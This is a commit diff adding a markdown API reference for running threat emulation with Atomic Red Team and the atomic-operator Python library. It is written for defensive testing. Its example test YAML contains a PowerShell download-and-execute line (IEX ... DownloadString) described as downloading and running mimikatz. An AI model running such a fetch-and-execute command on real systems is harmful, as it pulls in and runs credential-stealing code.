mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-07-19 22:19:39 +03:00
Add folder anatomy (scripts/agent.py + references/api-reference.md) for 648 cybersecurity skills
Complete skill folder anatomy across all cybersecurity skills: - scripts/agent.py: 80-150 line Python agents using real libraries (impacket, boto3, azure-mgmt-*, kubernetes, pefile, yara, scapy, shodan, stix2, etc.) - references/api-reference.md: real API documentation with method signatures - LICENSE: MIT license for all skill folders
This commit is contained in:
@@ -0,0 +1,67 @@
|
||||
# API Reference: Performing Threat Emulation with Atomic Red Team
|
||||
|
||||
## atomic-operator (Python)
|
||||
|
||||
```python
|
||||
from atomic_operator import AtomicOperator
|
||||
|
||||
operator = AtomicOperator()
|
||||
# Run specific technique
|
||||
operator.run(
|
||||
technique="T1059.001",
|
||||
atomics_path="./atomic-red-team/atomics",
|
||||
test_numbers=[1],
|
||||
)
|
||||
# Run with custom inputs
|
||||
operator.run(technique="T1059.001", input_arguments={"command": "whoami"})
|
||||
```
|
||||
|
||||
## Atomic Test YAML Format
|
||||
|
||||
```yaml
|
||||
attack_technique: T1059.001
|
||||
display_name: "PowerShell"
|
||||
atomic_tests:
|
||||
- name: "Mimikatz"
|
||||
description: "Downloads and runs mimikatz"
|
||||
supported_platforms: [windows]
|
||||
executor:
|
||||
name: powershell
|
||||
command: |
|
||||
IEX (New-Object Net.WebClient).DownloadString('#{url}')
|
||||
cleanup_command: |
|
||||
Remove-Item #{output_file}
|
||||
input_arguments:
|
||||
url:
|
||||
description: "URL to download"
|
||||
type: url
|
||||
default: "https://example.com/test"
|
||||
```
|
||||
|
||||
## Key CLI Commands
|
||||
|
||||
```bash
|
||||
# Clone atomics
|
||||
git clone https://github.com/redcanaryco/atomic-red-team
|
||||
|
||||
# Install operator
|
||||
pip install atomic-operator
|
||||
|
||||
# List tests for technique
|
||||
ls atomic-red-team/atomics/T1059.001/
|
||||
```
|
||||
|
||||
## Coverage Mapping
|
||||
|
||||
| Tactic | Example Techniques |
|
||||
|--------|-------------------|
|
||||
| Execution | T1059.001 (PowerShell), T1059.003 (cmd) |
|
||||
| Persistence | T1053.005 (Scheduled Task), T1547.001 (Run Keys) |
|
||||
| Defense Evasion | T1070.001 (Clear Event Logs) |
|
||||
| Credential Access | T1003.001 (LSASS), T1558.003 (Kerberoasting) |
|
||||
|
||||
### References
|
||||
|
||||
- Atomic Red Team: https://github.com/redcanaryco/atomic-red-team
|
||||
- atomic-operator: https://github.com/redcanaryco/atomic-operator
|
||||
- ATT&CK Navigator: https://mitre-attack.github.io/attack-navigator/
|
||||
Reference in New Issue
Block a user